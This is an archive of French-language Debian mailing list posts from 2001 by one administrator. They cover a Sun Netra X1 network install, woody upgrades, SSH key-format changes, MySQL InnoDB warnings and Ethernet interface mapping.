Suite et fin : - prendre l'image bootp sur : auric.debian.org/~bcollins/tftpboot-sun4u.img. - reprendre l'installation comme décrit ci-dessous de manière à arriver à l'installation de la Debian. - connecter le câble du réseau sur l'interface 1 (alors que le bootp était sur l'interface 0). - Installer la distrib par le net via les serveurs debian en FTP (http bogue). - arrivé au Device Driver le système dit qu'il ne trouve pas /target/lib/module/2.4.10. - passer sous shell et changer le nom du répertoire 2.4.9 en 2.4.10. - repasser dans l'installation et continuer. - C'a plante pendent l'extraction des packages (whiptail). Un passage en lom me montre un kernel panic. Plantage confirmé sur sparc.debian. Je n'ai pas trouvé de solution actuellement. J'attend une nouvelle version des fichiers de boot. Stef... > Synthèse de mes tests : > > Par CD-ROM, cela ne marche pas pour l'instant. J'essayerais une autre fois. > Je suis donc passé via le réseau. > > Pour le faire : > > - installer rarpd (Kernel 2.2 max) > - installer tftpd > > - mkdir /tftpboot > - chmod 755 /tftpboot > > - vi /etc/ethers > -> tapper une ligne avec l'addresse du NIC du sun suivis de l'IP choisie > par exemple : 00:03:ba:05:0e:70 192.168.61.77 > > - /etc/inetd.conf > -> changer dans la ligne tftpd, /boot par /tftpboot > > - télécharger : disks-sparc/3.0.13-2001-08-28/sun4u/tftpboot.img > > - copier l'image tftpboot.img du sun/linux dans /ftpdboot > - renommer l'image au nom HEXA de l'adresse IP choisie > par exemple : mv tftpboot.img C0A83D4D > > - relier tous le monde sur le LAN > > - allumer la sun et attendre le "ok" > - sur la sun, tapper "boot net" > - au bout de quelques instants le téléchargement commence... > > - L'écran d'installation de la Debian s'affiche... > > Mais malheureusement la carte Ethernet ne marche pas. Le driver Tulip est > bogué pour cette révision du shipset. > > NETDEV WATCHDOG: eth0: transmit timed out > > La suite au prochain épisode. > > Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: revenir en potato
>> J'ai tenté encore une fois de passer en woody. >> Mais ca a encore totalement merdé. >> Il m'enlève Xfree 3 pour me foutre le 4, il m'enlève tout. >> Le système est inutilisable. J'ai plus de X qui marche. > > Est-ce que tu es passé au 2.4.x ? J'ai essayé la même chose il y a quelques > temps avec un 2.2.19 et lors de la configuration de X ça a planté, un message > m'avertissait de l'incompatibilité de Xfree 4 avec le 2.2. A moins que j'ai > mal lu, l'anglais et moi ça fait 2 :) Marche très bien en 2.2.19 !!! Pour reconfigurer X : dpkg-reconfigure xserver-xfree86, choisir la config "simple", choisir une seule résolution, bien lire la première question lors de la config debconf... Méthode rodée pour passer en woody : - installer un Potato minimum (+task devian-dev et task-c++) - installer debconf - mettre à jour le kernel : apt-get install kernel-image-2.2.19 - rebooter - changer apt/sources.list pour woody - faire apt-get update - faire apt-get dist-upgrade - installer apt-utils et debconf-utils - refaire un apt-get -s upgrade pour voir si il reste des paquets - si oui, les forcer avec apt-get install le_paquet - Installer ses softs et ses outils. - rester en 2.2.19 sauf si c'est vraiment nécessaire - si ssh, penser à virer l'accès root dans /etc/ssh/sshd_config. Il est à noter que j'ai passé une dizaine de machine de production avec grosse config de Potato en Woody et que cela marche très très bien (sauf Postgresql qu'il faut dumper avant, c'est mieux aussi de reprendre une copie fraîche de httpd.conf et de exim.conf). Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Installation sur un SUN NETRA X1
Synthèse de mes tests : Par CD-ROM, cela ne marche pas pour l'instant. J'essayerais une autre fois. Je suis donc passé via le réseau. Pour le faire : - installer rarpd (Kernel 2.2 max) - installer tftpd - mkdir /tftpboot - chmod 755 /tftpboot - vi /etc/ethers -> tapper une ligne avec l'addresse du NIC du sun suivis de l'IP choisie par exemple : 00:03:ba:05:0e:70 192.168.61.77 - /etc/inetd.conf -> changer dans la ligne tftpd, /boot par /tftpboot - télécharger : disks-sparc/3.0.13-2001-08-28/sun4u/tftpboot.img - copier l'image tftpboot.img du sun/linux dans /ftpdboot - renommer l'image au nom HEXA de l'adresse IP choisie par exemple : mv tftpboot.img C0A83D4D - relier tous le monde sur le LAN - allumer la sun et attendre le "ok" - sur la sun, tapper "boot net" - au bout de quelques instants le téléchargement commence... - L'écran d'installation de la Debian s'affiche... Mais malheureusement la carte Ethernet ne marche pas. Le driver Tulip est bogué pour cette révision du shipset. NETDEV WATCHDOG: eth0: transmit timed out La suite au prochain épisode. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Le vendredi, je m'amuse...
Le suites de mes essais d'installation d'une Debian sur un SUN Netra X1 - J'ai ramené l'image 1 du CD Debian Sparc 2.2r3 que j'ai gravé. - j'ai installé un lecteur de CDROM ide sur le second bus du sun - j'ai mis un disque ide vierge dans l'autre bus ide. - je tape "boot cdrom" Et je me prend : --- ok boot cdrom Boot device: /[EMAIL PROTECTED],0/[EMAIL PROTECTED]/[EMAIL PROTECTED],0:f File and args: Can't read disk label. Can't open disk label package Can't open boot device --- Pas très concluent pour le moment. Je cherche. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Mise à jour du noyau
> Qui veux bien me faire un petit topo sur "comment mettre à jour son noyau" > pour aider un bleu ? Première question à ce poser : pourquoi ? si il marche bien ! Le plus simple : apt-get install kernel-image-xxx Ou apt-cache search kernel-image Et choisir dans la liste celui qui convient. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Netra X1
Merci pour toutes les précisions. > Il y a apparemment 2 pistes pour booter la bête : ouvrir le capot et > installer un lecteur de CD-ROM sur le port IDE libre (pas forcément > pratique) Très bonne idée. Plus simple et rapide à tester que le tftp. Faut voir si le cd arrivera à booter. Il semble rester un problème de base : la carte ethernet embarquée ne serait pas compatible linux (absence de driver). Info de juillet 01. Avec cela, je ferais mes essais. Je sens que cela va être un plaisir qui va me rappeler quand j'avais installé la Debian sur un Dec Alpha server (marche bien la bête d'ailleurs). Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Netra X1
Bonjour, Je voudrais installer une debian sur un Netra X1. Quelqu'un aurait-il des liens à me recommander ? Une recherche sur groups.google ne m'a pas apporter beaucoup de solution pour l'instant. La première question que je me pose est comment installer la distribution sur une machine qui n'a ni CD ni lecteur de disquette... Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: SSH sans mot de passe
> Je viens de m'apercevoir que le système de connexion ssh sans mot de passe > via clef public ne marche plus sur mes machines Woody depuis le 8 octobre. > Je me rappelle avoir vu passer une maj de ssh. J'ai trouvé. Ce serait sympa si le système disait autre chose qu'un valeureux "Permission denied". Woody est maintenant en rsa v2 par défaut (c'est vrai que j'avais vu le message sibyllin au moment de la maj). Le problème est que ssh-keygen fabrique une clef v1 par défaut et qu'en plus le fichier .ssh/authorized_keys s'appelle maintenant .ssh/authorized_keys2. Il faut donc faire "ssh-keygen -t rsa" pour générer une clef v2 sur la machine de départ. Attention : rsa veut dire v2, rsa1 veut dire v1... Ensuite, prendre la clef publique généré dans .ssh/id_rsa et la coller dans le .ssh/authorized_keys2 de la machine cible. Ou sinon faire ssh -1 blablabla... Pour rester compatible v1. Et si on a des "appelants" en client v1, il faut avoir les deux types de clefs... Les joies du ssh... Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
SSH sans mot de passe
Bonjour, Je viens de m'apercevoir que le système de connexion ssh sans mot de passe via clef public ne marche plus sur mes machines Woody depuis le 8 octobre. Je me rappelle avoir vu passer une maj de ssh. J'ai régénéré les clefs mais rien ne change. Dans auth.log j'ai juste ceci : Oct 18 15:55:43 axiome-pub sshd[30309]: Failed keyboard-interactive for rbackup from 62.210.157.249 port 33071 ssh2 Oct 18 15:55:43 axiome-pub last message repeated 2 times Oct 18 15:55:43 axiome-pub sshd[30309]: Connection closed by 62.210.157.249 Quelqu'un a-t-il rencontré ce problème ? La connexion donne ceci : axiome-filter:~# ssh -v [EMAIL PROTECTED] ls OpenSSH_2.9p2, SSH protocols 1.5/2.0, OpenSSL 0x0090602f debug1: Reading configuration data /etc/ssh/ssh_config debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 0 geteuid 0 anon 1 debug1: Connecting to axiome-pub.axiome-fr.com [195.154.216.140] port 22. debug1: temporarily_use_uid: 0/0 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 0/0 (e=0) debug1: restore_uid debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /root/.ssh/identity type 0 debug1: identity file /root/.ssh/id_rsa type -1 debug1: identity file /root/.ssh/id_dsa type -1 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p2 debug1: match: OpenSSH_2.9p2 pat ^OpenSSH Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_2.9p2 debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug1: kex: server->client aes128-cbc hmac-md5 none debug1: kex: client->server aes128-cbc hmac-md5 none debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP debug1: dh_gen_key: priv key bits set: 131/256 debug1: bits set: 1021/2049 debug1: SSH2_MSG_KEX_DH_GEX_INIT sent debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY debug1: Host 'axiome-pub.axiome-fr.com' is known and matches the RSA host key. debug1: Found key in /root/.ssh/known_hosts2:1 debug1: bits set: 1025/2049 debug1: ssh_rsa_verify: signature correct debug1: kex_derive_keys debug1: newkeys: mode 1 debug1: SSH2_MSG_NEWKEYS sent debug1: waiting for SSH2_MSG_NEWKEYS debug1: newkeys: mode 0 debug1: SSH2_MSG_NEWKEYS received debug1: done: ssh_kex2. debug1: send SSH2_MSG_SERVICE_REQUEST debug1: service_accept: ssh-userauth debug1: got SSH2_MSG_SERVICE_ACCEPT debug1: authentications that can continue: publickey,password,keyboard-interactive debug1: next auth method to try is publickey debug1: try privkey: /root/.ssh/id_rsa debug1: try privkey: /root/.ssh/id_dsa debug1: next auth method to try is password [EMAIL PROTECTED]'s password: debug1: authentications that can continue: publickey,password,keyboard-interactive Permission denied, please try again. [EMAIL PROTECTED]'s password: debug1: authentications that can continue: publickey,password,keyboard-interactive Permission denied, please try again. [EMAIL PROTECTED]'s password: debug1: authentications that can continue: publickey,password,keyboard-interactive debug1: next auth method to try is keyboard-interactive debug1: authentications that can continue: publickey,password,keyboard-interactive debug1: authentications that can continue: publickey,password,keyboard-interactive debug1: authentications that can continue: publickey,password,keyboard-interactive debug1: no more auth methods to try Permission denied (publickey,password,keyboard-interactive). debug1: Calling cleanup 0x8062e7c(0x0) .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: utilisation de kernel-image-2.4.10
> Le plus gros problème du moment (sur woody/sid/testing/unstable): > bug de modutils, par exemple, qui fait que le noyau est infoutu de > trouver les dépendances correctes, et qui fait qu'il est impossible de > compiler (même pour soi même) un noyau qui n'est pas le 2.4.12. Tu repasses en 2.2.19 Tu installe le dernier modutils 2.4.10-3 (qui refuse de s'installer en 2.4.x). Tu compiles un 2.4.12 sous 2.2.19. Tu l'installes. C'est bon. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Real Time Clock Driver & carte ASUS
Marche avec Kernel 2.4.12 seulement. Problème de bug dans un chip VIA. > Bonjour, > > Quelqu'un a-t-il une info sur se problème. > > Avec une woody installé sur un disque IDE avec une carte ASUS cuv4x, le > système s'arrête à la ligne "Real Time Clock Driver". Je peux continuer en > tapant sur CRTL-C. Au HALT, même problème, le système s'arrête sur le > hardware clock mais là, je suis obligé de faire un reset. J'ai essayé avec > un kernel 2.2.19 et 2.4.10, même résultat. > > Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Real Time Clock Driver & carte ASUS
Bonjour, Quelqu'un a-t-il une info sur se problème. Avec une woody installé sur un disque IDE avec une carte ASUS cuv4x, le système s'arrête à la ligne "Real Time Clock Driver". Je peux continuer en tapant sur CRTL-C. Au HALT, même problème, le système s'arrête sur le hardware clock mais là, je suis obligé de faire un reset. J'ai essayé avec un kernel 2.2.19 et 2.4.10, même résultat. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: { DriveReady SeekComplete Error }
merci
> Je te fais suivre un mail intéressant de Jean-Paul Vincent. Ceci n'a pas
> marché pour moi, mais ça risque de marcher pour toi, vu que tu as eu ces
> messages d'erreur lors d'un changement de kernel...
>
> -- Message transmis --
>
> Subject: Re: { DriveReady SeekComplete Error }
> Date: Wed, 10 Oct 2001 16:52:04 -0400
> From: Jean-Paul Vincent <[EMAIL PROTECTED]>
> To: debian-user-french@lists.debian.org
>
> Bonjour,
>
> Je viens de compiler le 2.4.11, j'en ai profité pour relire les «Help»'s :
> CONFIG_IDEDISK_MULTI_MODE
>
> If you get this error, try to say yes here:
> hda: set_multmode: status=0x51 ( DriveReady Seekcomplete Error )
moi c'est
dma_intr: error=0x84 ( DriveReady Seekcomplete Error )
dma_intr: status=0x51 ( DriveReady Seekcomplete Error )
Encore une autre variante...
Une histoire de réglage du dma que je n'ai pas encore vraiment regardé. Un
cable trop long dit google mais il est standard mon câble... En plus il est
assez court pour un 2.2.19 et serait trop long pour un 2.4.9.
Stef...
..
. Linux - Debian - php4 - Apache - MySQL - Infogerance .
. email: [EMAIL PROTECTED] - http://www.actionweb.fr .
. Tel: (0)141 906 100-Fax: (0)141 906 101.
..
[off topic] cartouche DDS-4
C'est un peu beaucoup off topic mais... Quelqu'un aurait-il une bonne adresse pour acheter des cartouches DAT DDS-4 en "gros", genre par 50. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: { DriveReady SeekComplete Error }
> Lors de la désactivation du swap (à l'arrêt ou au reboot uniquement),
> j'obtiens un message contenant plusieurs lignes, des "error", etc...
> J'ai aussi pu voir qqch du genre :
> status=0x51 { DriveReady SeekComplete Error }
J'ai le même problème depuis que je suis passé en 2.4.9. Je me prend se type
de message au boot pendant que lilo charge le système. Avec le 2.2.19, je
n'ai jamais cela. De plus mon disque dur est neuf (1 mois).
Je n'ai aussi rien trouvé de concluant sur google.
Stef...
..
. Linux - Debian - php4 - Apache - MySQL - Infogerance .
. email: [EMAIL PROTECTED] - http://www.actionweb.fr .
. Tel: (0)141 906 100-Fax: (0)141 906 101.
..
Re: liste de paquets
> Je voudrais savoir comment insérer une liste de paquet dans apt-get. PACKAGE=`cut -d" " -f0-1 packages.list` echo $PACKAGE apt-get install $PACKAGE Pas trouvé plus simple. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Pb avec MySQL / woody
Ezrreur de ma part, cela le fait sur tous les serveur Woody utilisant 3.23.36-2. Il semble y avoir un problème avec la version Woody car sur sid, cela me sort : 011009 12:55:19 mysqld started Cannot initialize InnoDB as 'innodb_data_file_path' is not set. If you do not want to use transactional InnoDB tables, add a line skip-innodb to the [mysqld] section of init parameters in your my.cnf or my.ini. If you want to use InnoDB tables, add for example, innodb_data_file_path = /mysql/data/ibdata1:20M More information on setting the parameters you find in the manual. /usr/sbin/mysqld: Prêt pour des connections Je sais donc maintenant qu'il faut insérer la commande skip-innodb. Si j'insère skip-innodb dans .my.cnf sur la version woody 3.23.36-2, la commande n'est pas reconnue et mysqld plante. Sur la version 3.23.43-2 de sid, cela marche. Cela me rappelle les premiers temps de la replication... Stef... > Je n'utilise pas innobase. Les fichiers .my.cnf sont identique entre le > serveur qui pose problème et un autre qui ne dit rien. Les versions de MySQL > sont identiques. > > J'ai même fait un dump des bases pour voir si quelqu'un n'aurait pas créé > une table de ce type. > > Stef... > > >> Mon serveur marchait bien avec la version qui était à jour sur >> woody il y a 24h. >> innobase est un nouveau format pour gérer les transactions sur >> MySQL. Tu n'en auras pas besoin si tu ne crées pas les tables >> avec "type=innobase", essaies de définir innobase_data_file_path >> dans le fichier de config (un truc du genre my.cnf je crois), >> peut-être que lors de l'upgrade à partir duquel l'option est >> nécessaire il n'a pas mis à jour le fichier de config. >> >> Alain >> >>> Bonjour, >>> >>> Sur une machine Woody uptodate, j'ai ce message au démarrage de MySQL : >>> >>> 011009 11:47:30 mysqld started >>> Can't initialize Innobase as 'innobase_data_file_path' is not set >>> /usr/sbin/mysqld: Prêt pour des connections >>> >>> J'ai plusieurs autres machines identiques ou je n'ai jamais ce message. >>> J'ai fait des recherches sur php.net et groups.google sans succès. .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Pb avec MySQL / woody
Je n'utilise pas innobase. Les fichiers .my.cnf sont identique entre le serveur qui pose problème et un autre qui ne dit rien. Les versions de MySQL sont identiques. J'ai même fait un dump des bases pour voir si quelqu'un n'aurait pas créé une table de ce type. Stef... > Mon serveur marchait bien avec la version qui était à jour sur > woody il y a 24h. > innobase est un nouveau format pour gérer les transactions sur > MySQL. Tu n'en auras pas besoin si tu ne crées pas les tables > avec "type=innobase", essaies de définir innobase_data_file_path > dans le fichier de config (un truc du genre my.cnf je crois), > peut-être que lors de l'upgrade à partir duquel l'option est > nécessaire il n'a pas mis à jour le fichier de config. > > Alain > >> Bonjour, >> >> Sur une machine Woody uptodate, j'ai ce message au démarrage de MySQL : >> >> 011009 11:47:30 mysqld started >> Can't initialize Innobase as 'innobase_data_file_path' is not set >> /usr/sbin/mysqld: Prêt pour des connections >> >> J'ai plusieurs autres machines identiques ou je n'ai jamais ce message. >> J'ai fait des recherches sur php.net et groups.google sans succès. .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Pb avec MySQL / woody
Bonjour, Sur une machine Woody uptodate, j'ai ce message au démarrage de MySQL : 011009 11:47:30 mysqld started Can't initialize Innobase as 'innobase_data_file_path' is not set /usr/sbin/mysqld: Prêt pour des connections J'ai plusieurs autres machines identiques ou je n'ai jamais ce message. J'ai fait des recherches sur php.net et groups.google sans succès. Quelqu'un saurait-il ce que cela signifie ? Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Webalizer : bug du 4 oct 2001
> Apparemment ça a l'air de résoudre le problème (au moins temporairement). > J'ai changé le epoch, rebuildé le package, et rattrapé le retard des stats. > En attendant de passer en 2.0.1, ça dépanne.. Problème de db3 sur Potato (-ldb3). Sans compter qu'il faut reconvertir toutes les statistiques. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: apt-get et /etc/sources.list
Il te manque des "sources" dans ton fichier. Utilise le mien comme exemple : # Potato - stable #deb ftp://ftp.debian.org/debian potato main contrib non-free #deb ftp://ftp.fr.debian.org/debian-non-US potato/non-US main contrib non-free #deb-src ftp://ftp.debian.org/debian potato main contrib non-free #deb http://ftp1.us.debian.org/debian dists/potato-proposed-updates/ #deb http://security.debian.org/ potato/updates main contrib non-free # Woody - Testing #deb http://http.us.debian.org/debian woody main contrib non-free #deb http://non-us.debian.org/debian-non-US woody/non-US main contrib non-free #deb-src http://http.us.debian.org/debian woody main contrib non-free # Sid - Instable deb http://http.us.debian.org/debian sid main contrib non-free deb-src http://http.us.debian.org/debian sid main contrib non-free deb http://non-us.debian.org/debian-non-US sid/non-US main contrib non-free # JAVA 2 deb ftp://ftp.oleane.net/pub/java-linux/debian woody non-free > oui, mais je ne comprend pas, j'ai trouvé sur debian.org qmail en version > .deb > et quand je fais apt-cache search qmail, il me répond > xfingerd - BSD - like finger daemon with qmail support. > > Dans mon fichier /etc/apt/sources.list, j'ai mis une URL http debian.org > => deb-src http://http.us.debian.org/debian stable main contrib non-free .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Deux ip sur eth0 ?
> Tu peux créer autant d'interface de type eth0:x (x un nombre) que tu > veux. Ce serait pas limité à 254 par carte des fois ! Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Config de deux cartes NE2000
Les cartes fonctionnent, je n'ai pas dit qu'elles ne fonctionnaient pas. Il est seulement impossible de les positionner selon ses choix sur eth0, eth1, etc. quand on a deux cartes ou plus utilisant le même module. Par exemple, J'ai une 3c905 et un eepro100, marche je peux les positionner comme je veux sur eth0 ou eth1 et dans le sens que je veux. J'insère une carte 3c900B, le système ne marche plus. L'attribution eth0, eth1, eth2 est aléatoire même en forçant les réglages via lilo. Stef... > J'ai deja utilisé 2 cartes (realtek) sur la meme machine. Le seul probleme que > j'ai rencontré etait un conflit d'IRQ avec une troisieme carte qui etait > intégrée a la carte mere. Mais sinon aucun probleme pour utiliser le meme > module > pour 2 cartes. > > Eventuellement, avec tes 2 ne2000, fait un "lspci -v" pour voir comment c'est > vu > au niveau hardware (et ca peut aider les gurus du coin - que je ne suis pas :) > > nicolas > > En réponse à Stephane Leclerc <[EMAIL PROTECTED]>: > >>> Si j'utilise deux cartes différentes (ne2k + realtek X, donc qui >>> utilisent chacune un module différent), je n'ai eu aucun probleme. >> Mais >>> je n'ai pas pu configurer les deux cartes qui utilisent le meme >> module >> >> J'ai le même problème avec deux cartes 3com. Si c'est le même module le >> système via lilo ne fonctionne pas. Pas trouvé d'autre solution. >> >> Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Config de deux cartes NE2000
> Si j'utilise deux cartes différentes (ne2k + realtek X, donc qui > utilisent chacune un module différent), je n'ai eu aucun probleme. Mais > je n'ai pas pu configurer les deux cartes qui utilisent le meme module J'ai le même problème avec deux cartes 3com. Si c'est le même module le système via lilo ne fonctionne pas. Pas trouvé d'autre solution. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Segmentation fault
Tu peux aussi lancer la commande isdnctrl avec strace, voir man strace et envoyer le résultat au mainteneur. Stef... >> Quand je tape : >>isdnctrl status ippp0 >> j'ai : >>ippp0 connected to 0860888080 >>Segmentation fault >> >> C'est sûrement pas bon. Que dois-je envisager pour de plus avoir cette >> erreur. >> Merci > > Segmentation fault est malheureusement un message tres generique > generalement un core est genere et pour savoir precisement d'ou vient le > probleme il faut analyser le core avec sdb, mais malheureusement ceci n'est > pas > si simple. .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Choix de l'interface pour chaque cartes EN
Toujours sur mon problème. J'ai trouvé finalement dans la doc de man interfaces et dans un exemple fournis avec ifupdown qu'il existe une commande "mapping" avec un script get-mac-address.sh pour récupérer l'adresse MAC des cartes. C'est bien mais les exemples données dans /doc ne marchent pas... Mon "exemple" aussi d'ailleurs. Par exemple : auto eth0 eth1 eth2 mapping eth0 eth1 eth2 script /root/get-mac-addr.sh map 00:C0:4F:B7:72:26 ext map 00:90:27:3F:18:12 int map 00:10:5A:2F:39:E0 sav iface ext inet static address 192.168.61.50 netmask 255.255.255.0 network 192.168.61.0 broadcast 192.168.61.255 gateway 192.168.61.1 iface int inet static address 192.168.61.51 netmask 255.255.255.0 iface sav inet static address 192.168.61.52 netmask 255.255.255.0 Si quelqu'un a déjà utilisé cette fonction, je suis intéressé par son expérience. Stef... > Sur une machine en Woody, j'ai 3 cartes Ethernet. Je voudrais dire au > système que tel et tel carte est eth0, eth1 et eth2. > > 00:11.0 Ethernet controller: 3Com Corporation 3c905 100BaseTX [Boomerang] > 00:0d.0 Ethernet controller: Intel Corporation 82557 [Ethernet Pro 100] (rev > 05) > 00:0f.0 Ethernet controller: 3Com Corporation 3c900B-TPO [Etherlink XL TPO] > (rev 04) > > Par défaut, le système prend les cartes dans l'ordre du bus PCI. > > Y-a-t-il un moyen de lui dire d'assigner les cartes dans l'ordre que je > cherche? J'ai chercher dans la doc interface et ifup/ifdown mais rien. .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Choix de l'interface pour chaque cartes EN
Bonjour, Sur une machine en Woody, j'ai 3 cartes Ethernet. Je voudrais dire au système que tel et tel carte est eth0, eth1 et eth2. 00:11.0 Ethernet controller: 3Com Corporation 3c905 100BaseTX [Boomerang] 00:0d.0 Ethernet controller: Intel Corporation 82557 [Ethernet Pro 100] (rev 05) 00:0f.0 Ethernet controller: 3Com Corporation 3c900B-TPO [Etherlink XL TPO] (rev 04) Par défaut, le système prend les cartes dans l'ordre du bus PCI. Y-a-t-il un moyen de lui dire d'assigner les cartes dans l'ordre que je cherche? J'ai chercher dans la doc interface et ifup/ifdown mais rien. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: erreur apt-get upgrade bizarre
> - l'upgrade m'indique qu'il y a 33 paquets à upgrader puis me sort une > erreur > (de tête) : kernel-image-2.4.10 depends fileutile (>=4.0) but 4.1-7 is to be > installed. Voir rapport de bogue sur modutils sur bugs.debian.org. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Imprimante Réseau
C'est vraiment chiant ce truc. A mort les lawers ! Stef... > xxx > Ce message et toutes les pieces jointes (ci - apres le \"message\" ) sont > etablis a l'attention exclusive de ses destinataires et sont strictement > confidentiels. Si vous n'etes pas le destinataire du message, il vous est > interdit d'en faire la copie, de le faire suivre, d'en divulguer le contenu > ou de l'utiliser en tout ou partie. Si vous avez recu ce message par erreur, > merci d'en avertir immediatement l'expediteur et de le detruire. > L'integrite du message n'est pas assuree sur Internet, chaque information > pouvant etre interceptee, modifiee, perdue, subir un retard dans sa > transmission ou contenir des virus. L'expediteur decline donc toute > responsabilite pour toute alteration, deformation ou falsification subie par > le message au cours de sa transmission. > Toute opinion contenue dans ce message appartient a son auteur et ne peut > engager la responsabilite du CCF ou de l'entite expeditrice du message, a > moins que cela ait ete clairement specifie dans le message et qu'il soit > verifie que son auteur etait en mesure d'engager le CCF ou ladite entite. > > xxx > This message and any attachments are confidential to the ordinary user of the > e-mail address to which it was addressed and may also be privileged. > If you are not the addressee you may not copy, forward, disclose or use any > part of the message or its attachments and if you have received this message > in error, please notify the sender immediately by return e-mail and delete it > from your system. > Internet communications cannot be guaranteed to be secure or error-free as > information could be intercepted, corrupted, lost, arrive late or contain > viruses. The sender therefore does not accept liability for any errors or > omissions in the context of this message which arise as a result of Internet > transmission. > Any opinions contained in this message are those of the author and are not > given or endorsed by the CCF or office through which this message is sent > unless otherwise clearly indicated in this message and the authority of the > author to so bind the CCF entity referred to is duly verified. > xxx .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: [OT]Re: NIMDA
> Pour moi, une solution serait que le firewall (iptable) modifie le > paquet "verole" en paquet de fin de connexion (RST) est l'envoie au > serveur. Je crois qu'iptable n'a pas cette fonction. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: NIMDA
